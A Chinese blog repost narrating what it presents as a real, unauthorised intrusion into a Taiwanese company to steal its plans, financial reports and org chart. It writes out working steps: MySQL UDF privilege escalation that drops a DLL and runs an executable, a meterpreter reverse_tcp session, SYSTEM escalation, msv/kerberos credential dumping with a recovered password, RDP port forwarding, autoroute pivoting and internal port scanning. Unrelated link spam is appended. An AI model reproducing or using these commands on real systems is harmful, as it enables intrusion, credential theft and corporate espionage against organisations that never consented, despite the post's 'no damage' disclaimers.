此文转载自90sec.仅作好文推荐。从本文可以学到很多知识,比如渗透时的明确目标、msf使用、渗透思路等等。
声明:本博客所有渗透测试都以模拟任务为点,以实战出发来探讨APT攻击,来讲述网络安全在今后的重要性,所有实战攻击都点到为止,并未破坏,下载,删除,更改,任何个人,组织,公司内部文件。
作者的话:计划是从亚洲各个国家开始,每个国家挑选一个具有针对性的公司/组织,以模拟任务为由,以实战渗透为主探讨,每一章都以数日来完成,甚至数月。不保证文章定期更新时间。
(为保证文章中公司的隐私,部分可能有马赛克,也由于是APT文章,具有一定的跨越时间,部分无截图)
模拟任务:拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情况。
第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不打算以主站权限为点渗透,动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。
主站为2008 R2
主站端口为
搜集端口为该公司的其他分站提供了有力的下一步。
进程搜集:红色为重点搜集源
D:\> tasklist
映像名稱                       PID 工作階段名稱      工作階段 #    RAM使用量
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        372 K
smss.exe                       296                            0      1,448 K
csrss.exe                      400                            0      6,968 K
wininit.exe                    452                            0      5,636 K
csrss.exe                      460                            1     12,460 K
winlogon.exe                   496                            1      6,484 K
services.exe                   556                            0     10,392 K
lsass.exe                      572                            0     22,076 K
lsm.exe                        584                            0      7,104 K
svchost.exe                    676                            0     10,840 K
svchost.exe                    760                            0      9,492 K
LogonUI.exe                    852                            1     19,632 K
svchost.exe                    864                            0     21,188 K
svchost.exe                    904                            0     34,904 K
svchost.exe                    944                            0     13,476 K
svchost.exe                    996                            0     13,512 K
svchost.exe                    168                            0     19,480 K
svchost.exe                    648                            0     12,348 K
spoolsv.exe                   1080                            0     16,672 K
armsvc.exe                    1124                            0      4,208 K
apnmcp.exe                    1172                            0      5,832 K
svchost.exe                   1196                            0      9,228 K
aspnet_state.exe              1224                            0      8,264 K
FileZilla Server.exe          1344                            0      7,876 K
svchost.exe                   1380                            0     10,408 K
inetinfo.exe                  1412                            0     31,680 K
EngineServer.exe              1448                            0        568 K
FrameworkService.exe          1548                            0     19,580 K
VsTskMgr.exe                  1612                            0      1,724 K
MDM.EXE                       1680                            0      6,652 K
naPrdMgr.exe                  1692                            0      2,116 K
mfevtps.exe                   1720                            0        992 K
sqlservr.exe                  1760                            0     13,284 K
svchost.exe                   1844                            0      3,452 K
snmp.exe                      1868                            0      9,264 K
sqlwriter.exe                1904                            0      7,440 K
vmtoolsd.exe                  1976                            0     17,012 K
snmp.exe                      1988                            0      3,164 K
conhost.exe                   1996                            0      4,784 K
vmware-converter-a.exe        2068                            0     31,460 K
vmware-converter.exe          2180                            0     38,176 K
vmware-converter.exe          2228                            0     32,828 K
svchost.exe                   2288                            0     14,152 K
McShield.exe                  2320                            0     89,332 K
mfeann.exe                    2468                            0      5,860 K
conhost.exe                   2476                            0      3,380 K
w3wp.exe                      2592                            0    160,760 K
w3wp.exe                      2812                            0    463,872 K
svchost.exe                   3452                            0      9,656 K
svchost.exe                   4104                            0      6,384 K
dllhost.exe                   4252                            0     12,192 K
msdtc.exe                     4424                            0      8,708 K
svchost.exe                   4196                            0     34,760 K
w3wp.exe                      5604                            0     12,632 K
TrustedInstaller.exe          4500                            0     11,788 K
cmd.exe                       6292                            0      3,932 K
conhost.exe                   6384                            0      4,476 K
tasklist.exe                  1496                            0      6,064 K
WmiPrvSE.exe                  5508                            0      7,272 K
 
账户搜集:(已处理)
重要路径搜集:
           (无图,路径搜集为未来可能需要dump file做准备)
数据库密码搜集:
           (无图,密码搜集为未来可能需要碰撞做准备)
杀毒软件搜集:
                  强力的麦咖啡
管理员习惯搜集:
        (无图,尽量避免与admin的fvsf)(面对面的vs是不是这么拼写?)
其他搜集:
           (由于是第一个shell,具体的已经忘记了)
第二台服务器权限:window x86 2003
根据上一台的服务器情报搜集很快得到了一台win03
IP .3
为一台开发机。目标仅支持asp,无其他脚本支持。但是服务器中安装有mysql,php等。并且无asp to mysql Device Drive IIS配置中也并不支持php。msf反弹后,继续搜集情报。

type C:\MySQL\MySQL Server 5.0\data\mysql\user.MYD

得到root hash

在实际情况中,交互的shell下运行mysql -uroot -pxxx无法继续交互,需要参数e解决这个问题。

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';"
mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"
如果限制上传大小同样可以hex解决上传大小问题。
以下为部分msf操作实例
msf  >use exploit/multi/handler
msf exploit(handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >exploit -l
meterpreter >ps
Process List
============
PID   PPID  Name               Arch  Session  User                           Path
---   ----  ----               ----  -------  ----                           ----
0     0     [System Process]                                             
4     0     System             x86   0        NT AUTHORITY\SYSTEM         
304   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
352   304   csrss.exe          x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
376   304   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
424   376   services.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
436   376   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
620   424   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
636   424   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
708   424   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
768   424   svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
812   424   svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
828   424   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
1000  424   spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
1028  424   msdtc.exe          x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\msdtc.exe
1160  424   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
1228  424   inetinfo.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\inetsrv\inetinfo.exe
1252  424   sqlservr.exe       x86   0        NT AUTHORITY\SYSTEM            C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
1304  424   mysqld.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
1348  424   svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
1408  424   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1472  424   mssearch.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
1720  424   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
2128  2084  explorer.exe       x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\Explorer.EXE
2208  2128  vmtoolsd.exe       x86   0        xxxxxxxxxxxx\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2232  2128  ctfmon.exe         x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\system32\ctfmon.exe
2244  2128  sqlmangr.exe       x86   0        xxxxxxxxxxxx\Administrator  C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
2396  424   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
2440  424   dllhost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\dllhost.exe
3008  2128  cmd.exe            x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\system32\cmd.exe
3024  3008  conime.exe         x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\system32\conime.exe
3180  636   wmiprvse.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe
3248  828   wuauclt.exe        x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\system32\wuauclt.exe
3380  376   logon.scr          x86   0        xxxxxxxxxxxx\Administrator  C:\WINDOWS\System32\logon.scr
meterpreter > migrate 2128
Migrating from 3104 to 2128...
Migration completed successfully.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > msv
[+] Running as SYSTEM
Retrieving msv credentials
msv credentials
===============
AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;109205  NTLM       xxxxxxxxxxxx  Administrator     lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;54469   NTLM                                          n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        xxxxxxxxxxxx$  n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
Retrieving kerberos credentials
kerberos credentials
====================
AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE  
0;54469   NTLM                                       
0;999     NTLM       WORKGROUP        xxxxxxxxxxxx$
0;109205  NTLM       xxxxxxxxxxxx  Administrator     123456
meterpreter > portfwd add -l 3389 -r x.x.x.x -p 3389  #IP已做处理
Local TCP relay created: :3389 <-> x.x.x.x:3389
meterpreter > portfwd
Active Port Forwards
====================
   Index  Local         Remote                Direction
   -----  -----         ------                ---------
   1      0.0.0.0:3389  x.x.x.x:3389  Forward
1 total active port forwards.
root@xxxx:/# rdesktop 127.0.0.1:3389
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
meterpreter > run autoroute -h
Usage:   run autoroute [-r] -s subnet -n netmask
Examples:
   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
   run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0
   run autoroute -s 10.10.10.1/24              # CIDR notation is also okay
   run autoroute -p                            # Print active routing table
   run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route
Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module
meterpreter > ifconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
Interface  2
============
Name         : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
Hardware MAC : 00:11:25:40:77:8f
MTU          : 1500
IPv4 Address : 10.23.255.3
IPv4 Netmask : 255.255.255.0
meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0
Adding a route to 10.23.255.3/255.255.255.0...
[+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227
Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.23.255.3        255.255.255.0      Session 3
meterpreter > ifconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
Interface  2
============
Name         : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
Hardware MAC : 00:11:25:40:77:8f
MTU          : 1500
IPv4 Address : 10.23.255.3
IPv4 Netmask : 255.255.255.0
meterpreter >
Background session 3? [y/N]
msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        445,80,3389,22   yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.23.255.1-255  yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect
timeout in milliseconds
最终得到了域控权限,并且得到了跨段的服务器权限。得到了个人机的重要权限,以及公司财报doc。
部分截图如下:由于时间问题,顺序可能打乱了。
跳段,到个人机
放弃权限,所有操作并未更改,下载,删除等一切损害该公司的行为。点到为止。
具有时间周期的渗透,最糟糕的就是回忆截图,实战中,很多需要抢时间的地方,很难想起截图或者做笔记,下次争取录屏,来回忆。

查看原文:http://www.am0s.com/jchw/170.html

转载于:https://www.cnblogs.com/qiniuyhm/p/6358151.html

【连载】第一章:亚洲-台湾(1)相关推荐

  1. 《G4Studio技术白皮书》连载の第一章:概述

    1.1.G4Studio概述        G4Studio是一套基于JavaEE面向中小软件企业的集需求分析.软件设计.编码实现.运行测试.运营维护.软件项目管理等于一体,力求覆盖整个软件生命周期的 ...

  2. hls fifo_【正点原子FPGA连载】第一章HLS简介--领航者ZYNQ之HLS 开发指南

    1)摘自[正点原子]领航者ZYNQ之HLS 开发指南 2)平台购买地址:https://item.taobao.com/item.htm?&id=606160108761 3)全套实验源码+手 ...

  3. 怎么利用c 语言编程进行进制计算,编程达人 《汇编、C语言基础教程》第一章 进制1.1 进制的定义(连载)...

    第一章进制 进制跟我们生活是息息相关的,比如时钟是60进制.24进制,星期是7进制等,最常见的就是十进制了.而计算机也离不开进制,计算机是通过二进制进行操作和运算的. 我们为什么要学习进制? 方便我们 ...

  4. 【正点原子FPGA连载】第一章 ZYNQ简介 -摘自【正点原子】领航者ZYNQ之FPGA开发指南_V2.0

    1)实验平台:正点原子领航者ZYNQ开发板 2)平台购买地址:https://item.taobao.com/item.htm?&id=606160108761 3)全套实验源码+手册+视频下 ...

  5. 【连载】大学物理笔记——第一章末+第二章质点动力学

    我是灼灼,一只初学Java的大一金渐层. 向往余秀华和狄兰·托马斯的疯狂,时常沉溺于将情感以诗相寄:追逐过王尔德.王小波的文字,后陷于毛姆和斯蒂芬·金不可自拔:热爱文学的浪潮,白日梦到底却总在现实里清 ...

  6. 【正点原子Linux连载】第一章 应用编程概念-摘自【正点原子】I.MX6U嵌入式Linux C应用编程指南V1.1

    1)实验平台:正点原子阿尔法Linux开发板 2)平台购买地址:https://item.taobao.com/item.htm?id=603672744434 2)全套实验源码+手册+视频下载地址: ...

  7. 【正点原子MP157连载】第一章 Ubuntu系统安装-摘自【正点原子】【正点原子】STM32MP1嵌入式Linux驱动开发指南V1.7

    1)实验平台:正点原子STM32MP157开发板 2)购买链接:https://item.taobao.com/item.htm?&id=629270721801 3)全套实验源码+手册+视频 ...

  8. 【正点原子FPGA连载】 第一章 MPSoC简介 摘自【正点原子】DFZU2EG/4EV MPSoC 之FPGA开发指南V1.0

    1)实验平台:正点原子MPSoC开发板 2)平台购买地址:https://detail.tmall.com/item.htm?id=692450874670 3)全套实验源码+手册+视频下载地址: h ...

  9. 【正点原子MP157连载】第一章 本书学习方法-摘自【正点原子】STM32MP1 M4裸机CubeIDE开发指南

    1)实验平台:正点原子STM32MP157开发板 2)购买链接:https://item.taobao.com/item.htm?&id=629270721801 3)全套实验源码+手册+视频 ...

  10. 鸟哥的Linux私房菜(服务器)- 第一章、架设服务器前的准备工作

    第一章.架设服务器前的准备工作 最近更新日期:2011/07/14 很多朋友因为自身或服务单位的需求,总是有架设各种网络服务器的时刻,这个时候大多数的前辈都会推荐他们使用 Linux 做为服务器架设的 ...

最新文章

  1. ZooKeeper和Diamond有什么不同
  2. hive整合sentry,impala,hue之后权限管理操作
  3. 采购订单模板_电子信息制造业解决方案,电子工业采购监管、管理、降本可控化...
  4. android MAT使用
  5. MySQL行转列完整SQL示例
  6. 前端学习(1767):前端调试值之内存监控的原理和方法二
  7. 【转】20个让Web Developer开发生涯更加轻松的工具
  8. xmake vs cmake对比分析
  9. 运输问题基本解 最小元素法
  10. 卸载 Oracle 19c
  11. 在群辉(NAS)中安装虚拟机套件(Virtual Machine Manager)
  12. 嵌入式系统开发笔记0_0:目录
  13. 基因编辑c语言,基因编辑为何失败?那是因为Cas9霸着C位
  14. 一个用于网络摄像机的开源软件 --- mjpg-streamer
  15. Cocoa 数据绑定 bind 教程
  16. 【Redis】Redis数据结构与对象(一)简单动态字符串(SDS)
  17. Matlab算法之优化计算1
  18. 基于STM32震动感应灯
  19. python获取邮件并转为pdf
  20. 做了 8 个月的技术经理,我信了……

热门文章

  1. 碎片化趋势下手机浏览器或成赢家
  2. Nvidia DX10 Lighting例子解析
  3. u-boot-1.3.4 for dm365 之网络驱动
  4. 戴帽子对眼睛是否有好处
  5. Spark数据倾斜-采样倾斜key并分拆join操作-详细图解与代码
  6. shuffle操作图解以及job-stage-task-partition区别
  7. 在DataFrame中新建列赋值后全部为NaN(转)
  8. ubuntu中,txt导入mysql数据库文件
  9. python面试题_17道Python面试题,分享给你以防不测!
  10. 自定义按键_DNF手游:策划宣布新增自定义按键布局,期待手游新版本的到来